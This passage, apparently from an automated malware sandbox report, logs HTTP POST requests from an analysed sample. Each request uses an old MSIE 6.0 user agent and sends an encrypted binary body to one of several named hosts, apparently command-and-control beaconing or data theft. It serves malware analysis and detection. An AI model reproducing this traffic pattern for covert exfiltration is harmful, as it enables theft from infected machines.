38 46 6e 75 47 4a 58 62 58 6c 57 50 4f 47 6d 47 6c 35 31 48 57 2f 4e 65 79 67 6b 6a 50 72 55 7a 43 4c 6b 44 43 7a 43 48 52 73 46 58 34 41 76 6e 66 61 53 6c 47 36 4f 44 55 61 63 47 5a 65 79 6d 41 4d 32 76 2f 79 32 66 2b 33 4e 57 66 6d 2f 30 73 50 74 51 41 30 42 36 64 6a 51 63 63 79 59 75 37 79 67 49 31 45 3d Data Ascii: TPnrnzoELsuzhy1M3UYeTX3J5RSq2Em6DqpET02v1QzPIkrnHiRi5yEBFUPR/VnRT8bbz0igiMDBHMvBR6G1jG0eBYRA5ZdrMalnYI5NYhH3RYo1ZffkM3Y0rBiUujr2gDYJkHXzupQLUkBCxXeMNx3gzqtOoOw9IY6TyHtWbGaA6QYMpebV29hDGZfbQwkz5NE0I6cBJKnfBa8gVoPxr4OF0uUigbn8Axly8HQnzoCluQpi5+mheudlCaXD1vBjsQAj4ONhjl2Mwql9Nb2765znHQtJuthUo31uqqFR058BzH9ra81nzlKaLVuBnWJ1r7AgVe+Q3oAZ25+bvhuoJjt8aabahaR8Zq6xyj+v3gvTFb2V1ZRbzpczZ3bS5P0H3qOfxxMnPjL9sLuOvA6p3tX9iL0k9fBPR27ltOExnLyM0u1BAone6nOJv8rV8Bcr5XCZ6B5LB4flAtoJk8FnuGJXbXlWPOGmGl51HW/NeygkjPrUzCLkDCzCHRsFX4AvnfaSlG6ODUacGZeymAM2v/y2f+3NWfm/0sPtQA0B6djQccyYu7ygI1E=
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.vitaindu.comCache-Control: no-cacheData Raw: 6b 55 37 59 71 43 37 2b 4a 63 73 39 66 77 5a 61 4f 53 38 68 67 35 46 2f 7a 63 61 75 32 2f 56 33 51 6d 6d 58 78 54 34 6e 64 46 45 45 35 76 4c 35 52 34 68 4c 57 6f 48 52 50 4f 73 67 42 72 53 4d 6d 75 46 66 2b 76 63 6b 57 76 4d 52 66 36 30 35 53 5a 6a 6d 54 75 47 73 35 64 63 54 5a 57 37 2f 58 6c 2b 47 65 7a 6d 34 33 2f 30 35 50 55 31 37 64 74 39 38 30 73 38 52 70 45 64 5a 53 33 35 50 4f 6c 57 57 65 59 52 67 35 69 67 50 41 6d 7a 70 51 48 63 49 43 72 32 65 6c 58 4e 72 59 6c 52 6d 30 68 51 44 36 4c 41 34 63 66 48 42 34 6d 43 6d 30 2b 4f 53 78 6e 58 37 37 46 58 72 32 49 30 6f 4a 74 52 37 6f 52 44 49 75 52 35 42 4a 69 44 2b 58 6f 4a 52 79 39 39 4f 63 33 6f 34 59 54 33 64 72 51 57 32 2f 7a 6c 45 58 55 61 36 30 56 2f 63 41 6d 6f 77 72 72 34 76 2f 42 59 31 2b 6b 6c 7a 6c 63 44 31 68 56 34 65 78 54 75 32 66 53 4a 56 69 67 66 57 2f 52 57 57 52 43 4e 33 45 61 6d 34 6a 57 73 42 57 79 53 52 54 78 44 50 4d 4d 44 75 52 65 45 49 6a 71 4d 4e 68 37 73 50 77 6e 59 36 74 33 54 4c 6f 51 43 42 6b 68 49 42 70 64 74 70 47 6b 48 79 62 43 67 64 36 4c 58 45 65 44 2f 6b 34 77 44 6e 73 47 47 6f 33 70 77 42 6f 4d 56 32 35 51 4c 42 68 69 73 59 4a 31 68 72 38 73 53 78 75 79 32 62 31 79 35 38 6a 47 49 33 55 6e 54 47 75 30 48 67 46 7a 64 64 44 33 55 41 38 4e 31 4c 5a 77 49 49 68 4d 70 50 75 46 37 59 46 78 41 51 78 33 46 6b 73 70 47 53 72 63 4f 38 45 2f 33 57 46 46 49 35 49 6a 71 76 41 44 43 53 56 68 45 70 75 68 62 37 2b 62 73 52 45 6d 4e 36 65 37 68 76 64 63 63 71 46 41 68 30 75 4e 4d 77 62 36 69 39 4c 65 36 78 4e 46 56 6f 51 63 67 48 6e 7a 39 7a 6e 48 42 76 48 61 77 42 31 4d 77 76 57 4d 76 73 35 6a 42 58 71 65 74 35 6a 6d 58 6f 75 32 51 6f 7a 67 3d 3d Data Ascii: kU7YqC7+Jcs9fwZaOS8hg5F/zcau2/V3QmmXxT4ndFEE5vL5R4hLWoHRPOsgBrSMmuFf+vckWvMRf605SZjmTuGs5dcTZW7/Xl+Gezm43/05PU17dt980s8RpEdZS35POlWWeYRg5igPAmzpQHcICr2elXNrYlRm0hQD6LA4cfHB4mCm0+OSxnX77FXr2I0oJtR7oRDIuR5BJiD+XoJRy99Oc3o4YT3drQW2/zlEXUa60V/cAmowrr4v/BY1+klzlcD1hV4exTu2fSJVigfW/RWWRCN3Eam4jWsBWySRTxDPMMDuReEIjqMNh7sPwnY6t3TLoQCBkhIBpdtpGkHybCgd6LXEeD/k4wDnsGGo3pwBoMV25QLBhisYJ1hr8sSxuy2b1y58jGI3UnTGu0HgFzddD3UA8N1LZwIIhMpPuF7YFxAQx3FkspGSrcO8E/3WFFI5IjqvADCSVhEpuhb7+bsREmN6e7hvdccqFAh0uNMwb6i9Le6xNFVoQcgHnz9znHBvHawB1MwvWMvs5jBXqet5jmXou2Qozg==
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.cel-cpa.comCache-Control: no-cacheData Raw: 65 47 55 4b 38 37 6c 58 51 63 74 4a 4c 42 67 50 53 42 33 46 4b 46 4b 4d 63 63 43 58 56 77 4d 6e 2f 56 57 55 75 42 72 69 6b 78 43 6b 4e 4c 50 59 34 6e 38 5a 64 61 6c 64 4c 65 4d 36 55 6a 4a 51 4d 51 54 59 63 4c 78 47 6f 79 64 74 4e 77 53 4a 55 6b 2f 36 5a 4d 59 6f 7a 79 64 63 30 37 71 63 63 30 74 72 4a 47 45 4f 42 30 2f 47 31 73 55 44 68 55 6d 74 42 54 55 5a 50 4a 41 4a 6d 6e 41 67 73 56 6a 38 73 4c 57 76 46 57 73 55 51 5a 6a 30 48 4e 61 32 39 65 6b 65 41 6f 63 37 75 31 5a 35 75 41 4c 78 69 33 32 41 70 65 6a 50 4c 32 4f 70 56 76 67 78 52 76 43 38 2b 45 38 70 77 37 6b 6d 35 69 47 58 76 4a 71 79 4c 5a 49 38 54 65 79 6c 57 77 2f 39 44 31 31 65 51 44 37 2b 79 52 57 4e 75 4a 41 79 69 67 43 78 51 2f 56 69 35 34 61 47 7a 31 32 4a 6e 69 76 43 51 77 4f 61 55 42 70 41 37 4b 42 4f 30 67 54 73 2b 64 57 44 64 42 65 63 76 59 34 70 4c 4d 63 73 46 53 31 5a 4f 58 46 35 4c 6a 4c 64 4f 55 77 31 59 59 41 52 70 55 48 65 39 64 39 36 67 77 31 41 43 73 73 73 73 6c 4a 77 53 69 59 4d 54 54 35 52 75 56 78 35 76 39 43 73 47 72 75 67 30 4a 4a 2f 48 72 38 7a 65 74 56 36 54 39 7a 38 45 42 42 55 57 42 35 48 4e 57 49 43 6e 51 51 6b 73 43 73 44 74 65 4a 34 2f 63 78 5a 2b 67 6f 74 76 43 58 38 75 56 6c 38 55 77 75 75 62 35 5a 4f 42 4f 35 53 4f 50 77 65 46 6c 4e 73 2f 2f 6b 63 56 75 43 54 44 6d 63 46 61 7a 59 78 45 77 4a 55 66 51 4f 41 37 56 32 6a 73 35 6b 52 4a 7a 4d 5a 4d 2b 6d 53 56 44 48 59 67 7a 75 33 39 43 31 5a 50 4a 62 31 31 42 59 62 38 44 6f 73 4d 36 69 5a 74 39 78 50 54 30 61 52 36 52 65 5a 67 51 64 52 48 4b 46 62 67 36 63 76 35 74 4f 4f 4b 67 38 6e 2b 43 68 78 64 50 67 5a 75 47 44 70 67 57 6c 2b 79 5a 55 42 4d 59 54 78 31 34 44 6f 4a 6c 70 75 52 4f 38 4a 67 51 61 35 77 59 42 52 56 35 33 57 4b 78 56 6f 65 68 78 61 34 6a 65 68 7a 72 38 3d Data Ascii: eGUK87lXQctJLBgPSB3FKFKMccCXVwMn/VWUuBrikxCkNLPY4n8ZdaldLeM6UjJQMQTYcLxGoydtNwSJUk/6ZMYozydc07qcc0trJGEOB0/G1sUDhUmtBTUZPJAJmnAgsVj8sLWvFWsUQZj0HNa29ekeAoc7u1Z5uALxi32ApejPL2OpVvgxRvC8+E8pw7km5iGXvJqyLZI8TeylWw/9D11eQD7+yRWNuJAyigCxQ/Vi54aGz12JnivCQwOaUBpA7KBO0gTs+dWDdBecvY4pLMcsFS1ZOXF5LjLdOUw1YYARpUHe9d96gw1ACsssslJwSiYMTT5RuVx5v9CsGrug0JJ/Hr8zetV6T9z8EBBUWB5HNWICnQQksCsDteJ4/cxZ+gotvCX8uVl8Uwuub5ZOBO5SOPweFlNs//kcVuCTDmcFazYxEwJUfQOA7V2js5kRJzMZM+mSVDHYgzu39C1ZPJb11BYb8DosM6iZt9xPT0aR6ReZgQdRHKFbg6cv5tOOKg8n+ChxdPgZuGDpgWl+yZUBMYTx14DoJlpuRO8JgQa5wYBRV53WKxVoehxa4jehzr8=
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.cel-cpa.comCache-Control: no-cacheData Raw: 65 47 55 4b 38 37 6c 58 51 63 74 4a 4c 42 67 50 53 42 33 46 4b 46 4b 4d 63 63 43 58 56 77 4d 6e 2f 56 57 55 75 42 72 69 6b 78 43 6b 4e 4c 50 59 34 6e 38 5a 64 61 6c 64 4c 65 4d 36 55 6a 4a 51 4d 51 54 59 63 4c 78 47 6f 79 64 74 4e 77 53 4a 55 6b 2f 36 5a 4d 59 6f 7a 79 64 63 30 37 71 63 63 30 74 72 4a 47 45 4f 42 30 2f 47 31 73 55 44 68 55 6d 74 42 54 55 5a 50 4a 41 4a 6d 6e 41 67 73 56 6a 38 73 4c 57 76 46 57 73 55 51 5a 6a 30 48 4e 61 32 39 65 6b 65 41 6f 63 37 75 31 5a 35 75 41 4c 78 69 33 32 41 70 65 6a 50 4c 32 4f 70 56 76 67 78 52 76 43 38 2b 45 38 70 77 37 6b 6d 35 69 47 58 76 4a 71 79 4c 5a 49 38 54 65 79 6c 57 77 2f 39 44 31 31 65 51 44 37 2b 79 52 57 4e 75 4a 41 79 69 67 43 78 51 2f 56 69 35 34 61 47 7a 31 32 4a 6e 69 76 43 51 77 4f 61 55 42 70 41 37 4b 42 4f 30 67 54 73 2b 64 57 44 64 42 65 63 76 59 34 70 4c 4d 63 73 46 53 31 5a 4f 58 46 35 4c 6a 4c 64 4f 55 77 31 59 59 41 52 70 55 48 65 39 64 39 36 67 77 31 41 43 73 73 73 73 6c 4a 77 53 69 59 4d 54 54 35 52 75 56 78 35 76 39 43 73 47 72 75 67 30 4a 4a 2f 48 72 38 7a 65 74 56 36 54 39 7a 38 45 42 42 55 57 42 35 48 4e 57 49 43 6e 51 51 6b 73 43 73 44 74 65 4a 34 2f 63 78 5a 2b 67 6f 74 76 43 58 38 75 56 6c 38 55 77 75 75 62 35 5a 4f 42 4f 35 53 4f 50 77 65 46 6c 4e 73 2f 2f 6b 63 56 75 43 54 44 6d 63 46 61 7a 59 78 45 77 4a 55 66 51 4f 41 37 56 32 6a 73 35 6b 52 4a 7a 4d 5a 4d 2b 6d 53 56 44 48 59 67 7a 75 33 39 43 31 5a 50 4a 62 31 31 42 59 62 38 44 6f 73 4d 36 69 5a 74 39 78 50 54 30 61 52 36 52 65 5a 67 51 64 52 48 4b 46 62 67 36 63 76 35 74 4f 4f 4b 67 38 6e 2b 43 68 78 64 50 67 5a 75 47 44 70 67 57 6c 2b 79 5a 55 42 4d 59 54 78 31 34 44 6f 4a 6c 70 75 52 4f 38 4a 67 51 61 35 77 59 42 52 56 35 33 57 4b 78 56 6f 65 68 78 61 34 6a 65 68 7a 72 38 3d Data Ascii: eGUK87lXQctJLBgPSB3FKFKMccCXVwMn/VWUuBrikxCkNLPY4n8ZdaldLeM6UjJQMQTYcLxGoydtNwSJUk/6ZMYozydc07qcc0trJGEOB0/G1sUDhUmtBTUZPJAJmnAgsVj8sLWvFWsUQZj0HNa29ekeAoc7u1Z5uALxi32ApejPL2OpVvgxRvC8+E8pw7km5iGXvJqyLZI8TeylWw/9D11eQD7+yRWNuJAyigCxQ/Vi54aGz12JnivCQwOaUBpA7KBO0gTs+dWDdBecvY4pLMcsFS1ZOXF5LjLdOUw1YYARpUHe9d96gw1ACsssslJwSiYMTT5RuVx5v9CsGrug0JJ/Hr8zetV6T9z8EBBUWB5HNWICnQQksCsDteJ4/cxZ+gotvCX8uVl8Uwuub5ZOBO5SOPweFlNs//kcVuCTDmcFazYxEwJUfQOA7V2js5kRJzMZM+mSVDHYgzu39C1ZPJb11BYb8DosM6iZt9xPT0aR6ReZgQdRHKFbg6cv5tOOKg8n+ChxdPgZuGDpgWl+yZUBMYTx14DoJlpuRO8JgQa5wYBRV53WKxVoehxa4jehzr8=
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 564User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.valselit.comCache-Control: no-cacheData Raw: 6e 38 50 2f 50 4d 67 4f 54 4d 75 79 58 4b 5a 48 43 32 4f 33 54 6a 76 4a 6c 51 56 51 43 61 30 4d 66 49 37 73 64 6b 4d 77 74 59 6a 30 70 64 54 74 4b 54 33 69 43 58 54 75 33 59 69 4f 69 37 61 62 66 46 6a 58 62 41 6d 6c 4f 46 78 78 48 71 74 68 6b 71 63 59 78 6a 32 53 4e 6d 4b 57 4b 45 70 77 61 74 6c 41 47 4a 54 66 6e 49 79 6f 6f 73 79 39 66 4b 58 4c 6e 62 49 51 51 56 6c 4d 69 36 6a 52 78 2f 4a 6b 45 72 42 6d 4b 39 55 6d 4b 6b 61 42 58 58 30 6d 62 71 70 51 48 4a 41 55 45 6d 51 6b 41 37 54 51 44 54 70 55 32 37 33 37 6f 55 35 68 7a 58 34 67 42 76 67 6b 63 38 47 56 32 35 33 7a 53 42 59 37 63 47 76 38 78 2b 5a 4c 55 35 52 6f 67 53 54 59 78 6f 6d 62 38 4d 56 32 56 44 31 37 35 44 31 33 55 57 66 63 57 6c 6c 2f 47 33 31 36 59 56 7a 4a 70 51 6c 70 39 70 79 57 2f 63 34 45 59 42 69 57 2b 38 31 66 55 37 6e 66 52 72 4d 71 6a 35 67 75 6e 73 42 61 6a 4e 57 68 59 53 38 47 38 72 74 53 63 72 54 65 4c 4d 2b 76 2f 68 6b 4a 6f 4d 78 31 43 65 6d 43 67 49 73 4a 63 4c 65 34 6d 56 57 75 35 49 33 68 5a 31 48 74 38 55 47 56 31 6a 72 38 2f 41 35 4c 62 53 66 4e 65 5a 65 64 49 61 72 51 6e 43 4a 6f 64 51 79 53 31 45 6f 32 55 47 64 44 67 76 43 63 7a 49 6f 62 56 6a 64 64 7a 77 37 44 75 72 6f 6d 4d 79 78 37 75 44 79 4b 57 62 73 6b 35 32 49 76 77 42 38 6b 44 64 4b 54 72 37 4b 77 33 50 4a 38 79 5a 69 70 4f 67 6a 46 57 70 2b 4f 55 53 48 53 74 76 6a 59 4d 4a 72 31 76 63 50 70 53 53 51 36 63 38 66 4b 74 44 63 6e 50 61 74 50 56 50 4d 37 47 61 43 38 7a 2b 66 59 79 4c 58 35 6e 55 36 39 56 4f 5a 6b 79 74 7a 75 76 53 2b 6f 50 52 68 50 33 4e 78 63 53 57 79 72 65 41 6e 62 68 33 64 64 34 30 78 50 2f 42 67 55 76 71 4b 43 77 79 71 43 42 77 78 6b 35 36 59 64 48 44 71 7a 39 56 5a 49 70 4d 30 48 77 2b 69 44 6a 73 4f 72 Data Ascii: n8P/PMgOTMuyXKZHC2O3TjvJlQVQCa0MfI7sdkMwtYj0pdTtKT3iCXTu3YiOi7abfFjXbAmlOFxxHqthkqcYxj2SNmKWKEpwatlAGJTfnIyoosy9fKXLnbIQQVlMi6jRx/JkErBmK9UmKkaBXX0mbqpQHJAUEmQkA7TQDTpU2737oU5hzX4gBvgkc8GV253zSBY7cGv8x+ZLU5RogSTYxomb8MV2VD175D13UWfcWll/G316YVzJpQlp9pyW/c4EYBiW+81fU7nfRrMqj5gunsBajNWhYS8G8rtScrTeLM+v/hkJoMx1CemCgIsJcLe4mVWu5I3hZ1Ht8UGV1jr8/A5LbSfNeZedIarQnCJodQyS1Eo2UGdDgvCczIobVjddzw7DuromMyx7uDyKWbsk52IvwB8kDdKTr7Kw3PJ8yZipOgjFWp+OUSHStvjYMJr1vcPpSSQ6c8fKtDcnPatPVPM7GaC8z+fYyLX5nU69VOZkytzuvS+oPRhP3NxcSWyreAnbh3dd40xP/BgUvqKCwyqCBwxk56YdHDqz9VZIpM0Hw+iDjsOr
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fe-bauer.deCache-Control: no-cacheData Raw: 34 2b 74 4a 45 4d 75 4c 59 38 74 4f 62 75 54 72 49 75 34 43 34 54 52 6b 72 43 4d 52 4b 68 61 34 4c 77 70 79 35 77 64 2b 64 47 48 54 34 74 56 7a 7a 51 4a 47 47 49 2f 6b 66 4d 4b 61 37 71 31 38 54 34 71 4b 61 4e 34 4c 66 43 6b 67 6e 32 52 30 4a 4b 6e 77 69 58 75 6d 62 6c 78 45 55 4c 74 56 6e 7a 31 30 7a 4b 6e 4e 6d 6c 68 53 37 47 78 54 30 41 38 68 53 42 73 38 62 38 4e 64 42 6f 41 44 7a 32 32 7a 2b 42 75 4f 48 74 7a 57 38 30 6c 72 30 42 5a 53 69 59 48 33 33 72 4f 57 56 66 4e 6a 59 64 41 77 4d 62 7a 47 6b 35 67 79 67 30 65 74 41 54 6a 65 6e 72 4c 77 39 69 41 68 47 69 75 62 2f 31 72 47 70 62 6c 44 56 43 2b 49 77 38 74 4d 30 38 61 2f 50 50 41 7a 79 77 66 70 64 71 68 69 47 38 69 31 64 72 65 4a 38 72 4d 76 6e 74 39 6f 79 58 65 6e 46 6c 48 4e 30 51 4d 46 68 7a 67 4b 42 74 6f 4b 56 46 4c 62 42 7a 46 2f 53 49 36 52 57 6a 78 2f 77 64 39 57 49 73 6e 6d 6d 57 49 30 70 2f 34 7a 76 32 31 6a 50 53 57 67 47 78 50 31 2b 53 48 71 79 56 42 30 37 6f 56 6b 44 39 50 50 53 62 34 69 38 47 4a 35 79 67 4b 5a 58 4a 52 72 65 30 67 54 68 44 74 79 2f 44 66 53 45 42 4a 68 65 32 76 69 4a 70 78 49 76 70 71 73 73 48 30 67 73 4a 56 6a 4e 30 73 33 75 64 58 4e 2b 54 6f 72 71 58 6d 51 70 35 45 76 4c 32 66 6c 42 31 59 53 65 50 4f 58 70 2f 72 44 36 57 51 75 79 59 32 50 49 53 36 33 64 43 57 75 6f 78 42 37 56 38 77 52 47 61 51 51 35 7a 50 63 39 38 4d 50 6f 32 58 47 68 43 74 59 79 79 70 6f 4a 53 35 58 47 6f 6f 64 42 6c 52 39 2b 59 64 4e 51 4b 69 74 66 53 59 6b 33 48 65 4f 47 71 58 51 77 31 30 77 38 7a 73 64 75 46 6f 64 2b 4d 69 6b 6e 41 64 58 63 51 42 35 77 67 4c 4e 75 42 58 4b 66 67 74 55 62 2f 6f 43 6c 69 61 6f 6c 76 55 37 62 47 62 6c 45 58 49 65 58 71 6d 46 77 6d 4e 2f 47 57 74 33 2f 6d 49 64 58 4f 70 69 77 70 4d 56 46 73 65 41 32 61 2f 58 31 4c 4b 6e 6e 7a 66 4f 4a 65 69 4b Data Ascii: 4+tJEMuLY8tObuTrIu4C4TRkrCMRKha4Lwpy5wd+dGHT4tVzzQJGGI/kfMKa7q18T4qKaN4LfCkgn2R0JKnwiXumblxEULtVnz10zKnNmlhS7GxT0A8hSBs8b8NdBoADz22z+BuOHtzW80lr0BZSiYH33rOWVfNjYdAwMbzGk5gyg0etATjenrLw9iAhGiub/1rGpblDVC+Iw8tM08a/PPAzywfpdqhiG8i1dreJ8rMvnt9oyXenFlHN0QMFhzgKBtoKVFLbBzF/SI6RWjx/wd9WIsnmmWI0p/4zv21jPSWgGxP1+SHqyVB07oVkD9PPSb4i8GJ5ygKZXJRre0gThDty/DfSEBJhe2viJpxIvpqssH0gsJVjN0s3udXN+TorqXmQp5EvL2flB1YSePOXp/rD6WQuyY2PIS63dCWuoxB7V8wRGaQQ5zPc98MPo2XGhCtYyypoJS5XGoodBlR9+YdNQKitfSYk3HeOGqXQw10w8zsduFod+MiknAdXcQB5wgLNuBXKfgtUb/oCliaolvU7bGblEXIeXqmFwmN/GWt3/mIdXOpiwpMVFseA2a/X1LKnnzfOJeiK
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fe-bauer.deCache-Control: no-cacheData Raw: 34 2b 74 4a 45 4d 75 4c 59 38 74 4f 62 75 54 72 49 75 34 43 34 54 52 6b 72 43 4d 52 4b 68 61 34 4c 77 70 79 35 77 64 2b 64 47 48 54 34 74 56 7a 7a 51 4a 47 47 49 2f 6b 66 4d 4b 61 37 71 31 38 54 34 71 4b 61 4e 34 4c 66 43 6b 67 6e 32 52 30 4a 4b 6e 77 69 58 75 6d 62 6c 78 45 55 4c 74 56 6e 7a 31 30 7a 4b 6e 4e 6d 6c 68 53 37 47 78 54 30 41 38 68 53 42 73 38 62 38 4e 64 42 6f 41 44 7a 32 32 7a 2b 42 75 4f 48 74 7a 57 38 30 6c 72 30 42 5a 53 69 59 48 33 33 72 4f 57 56 66 4e 6a 59 64 41 77 4d 62 7a 47 6b 35 67 79 67 30 65 74 41 54 6a 65 6e 72 4c 77 39 69 41 68 47 69 75 62 2f 31 72 47 70 62 6c 44 56 43 2b 49 77 38 74 4d 30 38 61 2f 50 50 41 7a 79 77 66 70 64 71 68 69 47 38 69 31 64 72 65 4a 38 72 4d 76 6e 74 39 6f 79 58 65 6e 46 6c 48 4e 30 51 4d 46 68 7a 67 4b 42 74 6f 4b 56 46 4c 62 42 7a 46 2f 53 49 36 52 57 6a 78 2f 77 64 39 57 49 73 6e 6d 6d 57 49 30 70 2f 34 7a 76 32 31 6a 50 53 57 67 47 78 50 31 2b 53 48 71 79 56 42 30 37 6f 56 6b 44 39 50 50 53 62 34 69 38 47 4a 35 79 67 4b 5a 58 4a 52 72 65 30 67 54 68 44 74 79 2f 44 66 53 45 42 4a 68 65 32 76 69 4a 70 78 49 76 70 71 73 73 48 30 67 73 4a 56 6a 4e 30 73 33 75 64 58 4e 2b 54 6f 72 71 58 6d 51 70 35 45 76 4c 32 66 6c 42 31 59 53 65 50 4f 58 70 2f 72 44 36 57 51 75 79 59 32 50 49 53 36 33 64 43 57 75 6f 78 42 37 56 38 77 52 47 61 51 51 35 7a 50 63 39 38 4d 50 6f 32 58 47 68 43 74 59 79 79 70 6f 4a 53 35 58 47 6f 6f 64 42 6c 52 39 2b 59 64 4e 51 4b 69 74 66 53 59 6b 33 48 65 4f 47 71 58 51 77 31 30 77 38 7a 73 64 75 46 6f 64 2b 4d 69 6b 6e 41 64 58 63 51 42 35 77 67 4c 4e 75 42 58 4b 66 67 74 55 62 2f 6f 43 6c 69 61 6f 6c 76 55 37 62 47 62 6c 45 58 49 65 58 71 6d 46 77 6d 4e 2f 47 57 74 33 2f 6d 49 64 58 4f 70 69 77 70 4d 56 46 73 65 41 32 61 2f 58 31 4c 4b 6e 6e 7a 66 4f 4a 65 69 4b Data Ascii: 4+tJEMuLY8tObuTrIu4C4TRkrCMRKha4Lwpy5wd+dGHT4tVzzQJGGI/kfMKa7q18T4qKaN4LfCkgn2R0JKnwiXumblxEULtVnz10zKnNmlhS7GxT0A8hSBs8b8NdBoADz22z+BuOHtzW80lr0BZSiYH33rOWVfNjYdAwMbzGk5gyg0etATjenrLw9iAhGiub/1rGpblDVC+Iw8tM08a/PPAzywfpdqhiG8i1dreJ8rMvnt9oyXenFlHN0QMFhzgKBtoKVFLbBzF/SI6RWjx/wd9WIsnmmWI0p/4zv21jPSWgGxP1+SHqyVB07oVkD9PPSb4i8GJ5ygKZXJRre0gThDty/DfSEBJhe2viJpxIvpqssH0gsJVjN0s3udXN+TorqXmQp5EvL2flB1YSePOXp/rD6WQuyY2PIS63dCWuoxB7V8wRGaQQ5zPc98MPo2XGhCtYyypoJS5XGoodBlR9+YdNQKitfSYk3HeOGqXQw10w8zsduFod+MiknAdXcQB5wgLNuBXKfgtUb/oCliaolvU7bGblEXIeXqmFwmN/GWt3/mIdXOpiwpMVFseA2a/X1LKnnzfOJeiK
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fe-bauer.deCache-Control: no-cacheData Raw: 34 2b 74 4a 45 4d 75 4c 59 38 74 4f 62 75 54 72 49 75 34 43 34 54 52 6b 72 43 4d 52 4b 68 61 34 4c 77 70 79 35 77 64 2b 64 47 48 54 34 74 56 7a 7a 51 4a 47 47 49 2f 6b 66 4d 4b 61 37 71 31 38 54 34 71 4b 61 4e 34 4c 66 43 6b 67 6e 32 52 30 4a 4b 6e 77 69 58 75 6d 62 6c 78 45 55 4c 74 56 6e 7a 31 30 7a 4b 6e 4e 6d 6c 68 53 37 47 78 54 30 41 38 68 53 42 73 38 62 38 4e 64 42 6f 41 44 7a 32 32 7a 2b 42 75 4f 48 74 7a 57 38 30 6c 72 30 42 5a 53 69 59 48 33 33 72 4f 57 56 66 4e 6a 59 64 41 77 4d 62 7a 47 6b 35 67 79 67 30 65 74 41 54 6a 65 6e 72 4c 77 39 69 41 68 47 69 75 62 2f 31 72 47 70 62 6c 44 56 43 2b 49 77 38 74 4d 30 38 61 2f 50 50 41 7a 79 77 66 70 64 71 68 69 47 38 69 31 64 72 65 4a 38 72 4d 76 6e 74 39 6f 79 58 65 6e 46 6c 48 4e 30 51 4d 46 68 7a 67 4b 42 74 6f 4b 56 46 4c 62 42 7a 46 2f 53 49 36 52 57 6a 78 2f 77 64 39 57 49 73 6e 6d 6d 57 49 30 70 2f 34 7a 76 32 31 6a 50 53 57 67 47 78 50 31 2b 53 48 71 79 56 42 30 37 6f 56 6b 44 39 50 50 53 62 34 69 38 47 4a 35 79 67 4b 5a 58 4a 52 72 65 30 67 54 68 44 74 79 2f 44 66 53 45 42 4a 68 65 32 76 69 4a 70 78 49 76 70 71 73 73 48 30 67 73 4a 56 6a 4e 30 73 33 75 64 58 4e 2b 54 6f 72 71 58 6d 51 70 35 45 76 4c 32 66 6c 42 31 59 53 65 50 4f 58 70 2f 72 44 36 57 51 75 79 59 32 50 49 53 36 33 64 43 57 75 6f 78 42 37 56 38 77 52 47 61 51 51 35 7a 50 63 39 38 4d 50 6f 32 58 47 68 43 74 59 79 79 70 6f 4a 53 35 58 47 6f 6f 64 42 6c 52 39 2b 59 64 4e 51 4b 69 74 66 53 59 6b 33 48 65 4f 47 71 58 51 77 31 30 77 38 7a 73 64 75 46 6f 64 2b 4d 69 6b 6e 41 64 58 63 51 42 35 77 67 4c 4e 75 42 58 4b 66 67 74 55 62 2f 6f 43 6c 69 61 6f 6c 76 55 37 62 47 62 6c 45 58 49 65 58 71 6d 46 77 6d 4e 2f 47 57 74 33 2f 6d 49 64 58 4f 70 69 77 70 4d 56 46 73 65 41 32 61 2f 58 31 4c 4b 6e 6e 7a 66 4f 4a 65 69 4b Data Ascii: 4+tJEMuLY8tObuTrIu4C4TRkrCMRKha4Lwpy5wd+dGHT4tVzzQJGGI/kfMKa7q18T4qKaN4LfCkgn2R0JKnwiXumblxEULtVnz10zKnNmlhS7GxT0A8hSBs8b8NdBoADz22z+BuOHtzW80lr0BZSiYH33rOWVfNjYdAwMbzGk5gyg0etATjenrLw9iAhGiub/1rGpblDVC+Iw8tM08a/PPAzywfpdqhiG8i1dreJ8rMvnt9oyXenFlHN0QMFhzgKBtoKVFLbBzF/SI6RWjx/wd9WIsnmmWI0p/4zv21jPSWgGxP1+SHqyVB07oVkD9PPSb4i8GJ5ygKZXJRre0gThDty/DfSEBJhe2viJpxIvpqssH0gsJVjN0s3udXN+TorqXmQp5EvL2flB1YSePOXp/rD6WQuyY2PIS63dCWuoxB7V8wRGaQQ5zPc98MPo2XGhCtYyypoJS5XGoodBlR9+YdNQKitfSYk3HeOGqXQw10w8zsduFod+MiknAdXcQB5wgLNuBXKfgtUb/oCliaolvU7bGblEXIeXqmFwmN/GWt3/mIdXOpiwpMVFseA2a/X1LKnnzfOJeiK
